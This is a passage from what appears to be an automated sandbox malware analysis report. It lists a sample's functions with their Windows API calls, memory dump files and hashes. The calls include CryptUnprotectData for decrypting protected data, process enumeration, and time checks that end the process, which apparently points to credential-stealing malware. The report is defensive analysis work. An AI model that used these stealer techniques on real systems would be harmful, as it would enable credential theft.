                                        • Instruction Fuzzy Hash: 2B413EB5D0421DDFDB10CFA4DD89BEEB7B8BB88704F1046A8E509A7280D7745A84CF91
                                        Function 00986BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00986C0C
                                        • sscanf.NTDLL ref: 00986C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00986C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00986C60
                                        • ExitProcess.KERNEL32 ref: 00986C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 4dfb38cfedbbd1f5479f13ff9188f546b6f083601f6829ecbf6afb531532a999
                                        • Instruction ID: 196b8d6549da8dffde817577c3f248f1afa5b11ceb00894a9e9f9b7fb5c98ea2
                                        • Opcode Fuzzy Hash: 4dfb38cfedbbd1f5479f13ff9188f546b6f083601f6829ecbf6afb531532a999
                                        • Instruction Fuzzy Hash: 4321CB75D14209ABCF14EFE4E845AEEB7B9FF48300F04852AE506E7250EB749608CB65
                                        Function 009772A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009772AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009772B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009772E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00977304
                                        • LocalFree.KERNEL32(?), ref: 0097730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 04d9dd32de887b58917da90a9efb600cf531f1eae14e661d7dacefdd8ce550f7
                                        • Instruction ID: 992faff729134007f3894e6f54b56fc230ee396f9ad4b819189c2d170b3e59c4
                                        • Opcode Fuzzy Hash: 04d9dd32de887b58917da90a9efb600cf531f1eae14e661d7dacefdd8ce550f7
                                        • Instruction Fuzzy Hash: 14010CB5A44308BBDB10DFE8DC46F9EB778BB45B00F108544FB09AB2C0D7B0AA049B64
                                        Function 00989790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009897AE
                                        • Process32First.KERNEL32(00990ACE,00000128), ref: 009897C2
                                        • Process32Next.KERNEL32(00990ACE,00000128), ref: 009897D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 009897EC
                                        • CloseHandle.KERNEL32(00990ACE), ref: 0098980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 0b3c490d2364537d69f5e94717f7b5dc1bd66685dc1138a1383c2a05c39638ab
                                        • Instruction ID: 0dcd91fd599ecc1477a191bac816744fcf99641fa0cd3eb5fbc0753e678b413b
                                        • Opcode Fuzzy Hash: 0b3c490d2364537d69f5e94717f7b5dc1bd66685dc1138a1383c2a05c39638ab
                                        • Instruction Fuzzy Hash: B0011E79A14209EBDB20DFA4CD44BEDBBB8BB09700F144688F509D7240D7749B44CF90
                                        Function 00DD13BB Relevance: 7.4, Strings: 5, Instructions: 1179COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *]x$2r=$Cj)$1O$[w
                                        • API String ID: 0-1766380632
                                        • Opcode ID: 1eed163dcef7a4584f7b01f9687811640bd60be2c3ebdb684b452babfddcc6cd
                                        • Instruction ID: d1d5cd4c609c44f6648ce61f17b294c2d6fb67497d12c9ea38fb2bfc761a048d
                                        • Opcode Fuzzy Hash: 1eed163dcef7a4584f7b01f9687811640bd60be2c3ebdb684b452babfddcc6cd
                                        • Instruction Fuzzy Hash: CF7218F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DE6C4C3740EA7558058696
                                        Function 00994573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction ID: 9adcb3d105788d66341962a231b1ff37accd1ca0e33257a4cba7217ccc134794
                                        • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction Fuzzy Hash: 4A63523241EBD51ECF27CB3847B65527F6ABA1321031E49CEC8C18F5B3C6949A1AE356
                                        Function 00DCF34E Relevance: 6.6, Strings: 4, Instructions: 1597COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2.$EH~$iNo$iNo
                                        • API String ID: 0-778482689
                                        • Opcode ID: 0a7f06dee358c1ca76b294d730c840de8b92e08f7aad1da1f312b17ef09f0ae5
                                        • Instruction ID: 798964c36454f2ea8358701c19835f8049f46da3f905df83f37c71cdb0f0b981
                                        • Opcode Fuzzy Hash: 0a7f06dee358c1ca76b294d730c840de8b92e08f7aad1da1f312b17ef09f0ae5
                                        • Instruction Fuzzy Hash: B5B2F6F360C2049FE304AE2DEC8567ABBE9EF94320F1A493DE6C4C7744E63598458796
                                        Function 00989030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,009751D4,40000001,00000000,00000000,?,009751D4), ref: 00989050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 16e1fb851cb4040e000a288aa4b8bf4c3caef2074fd6115e5cd5bc06aef5c3fd
                                        • Instruction ID: dad57f8a26a098607acee6e4ca19d4c18e4c83a744346f8c5adb0c5bd46e9eac
                                        • Opcode Fuzzy Hash: 16e1fb851cb4040e000a288aa4b8bf4c3caef2074fd6115e5cd5bc06aef5c3fd
                                        • Instruction Fuzzy Hash: 9D11C574204209EFDB04DF54DC85BBA33A9BF8A310F148958FA1A8B350D779E9419BA1
                                        Function 0097A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
                                        • LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: ac983bb3d87e23c8b215abc1dbf94ddea81ed323d9e0738891d8eda055fb7dbd
                                        • Instruction ID: 8504343620fad0d42fabdea23afee22bccb7478002a231b86308fb4c6fd8fd58
                                        • Opcode Fuzzy Hash: ac983bb3d87e23c8b215abc1dbf94ddea81ed323d9e0738891d8eda055fb7dbd
                                        • Instruction Fuzzy Hash: FC116674640308EFEB11CF54CC55FAA77B9FB89B14F208558F9199B290C7B6A941CB50
                                        Function 00987BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0181F470,00000000,?,00990DF8,00000000,?,00000000,00000000), ref: 00987BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0181F470,00000000,?,00990DF8,00000000,?,00000000,00000000,?), ref: 00987C0D
                                        • wsprintfA.USER32 ref: 00987C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: b6faff1057f4ac28594b2bca2f578c9ef2cdb7a86fd127644e1bb057b68f6cb0
                                        • Instruction ID: 6a1b6f8978d0671a3a988d4a8b83856166dbd64f573e57fef12ed6c28d15edfb
                                        • Opcode Fuzzy Hash: b6faff1057f4ac28594b2bca2f578c9ef2cdb7a86fd127644e1bb057b68f6cb0
                                        • Instruction Fuzzy Hash: F011CEB0A0A218EFEB209F58DC49FA9B778FB41710F100395F61AA33C0C7745A408B90
                                        Function 00983970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(0098E120,00000000,00000001,0098E110,00000000), ref: 009839A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00983A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 36b0ae96f8c9f4d6553be1b84209bf9a298b8bc6fc0cd8a5f1ce9f71c077fad8
                                        • Instruction ID: d97e96ef45e2cee05f280eede9905f28b0c179f51c81fdac7a2dceb225b01ef4
                                        • Opcode Fuzzy Hash: 36b0ae96f8c9f4d6553be1b84209bf9a298b8bc6fc0cd8a5f1ce9f71c077fad8
                                        • Instruction Fuzzy Hash: 4C41E975A40A189FDB24DB54CC95F9BB7B5BB48702F4081D8E608E72D0D7B1AE85CF50
                                        Function 0097A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0097A2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0097A2F3
                                        • LocalFree.KERNEL32(?), ref: 0097A323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
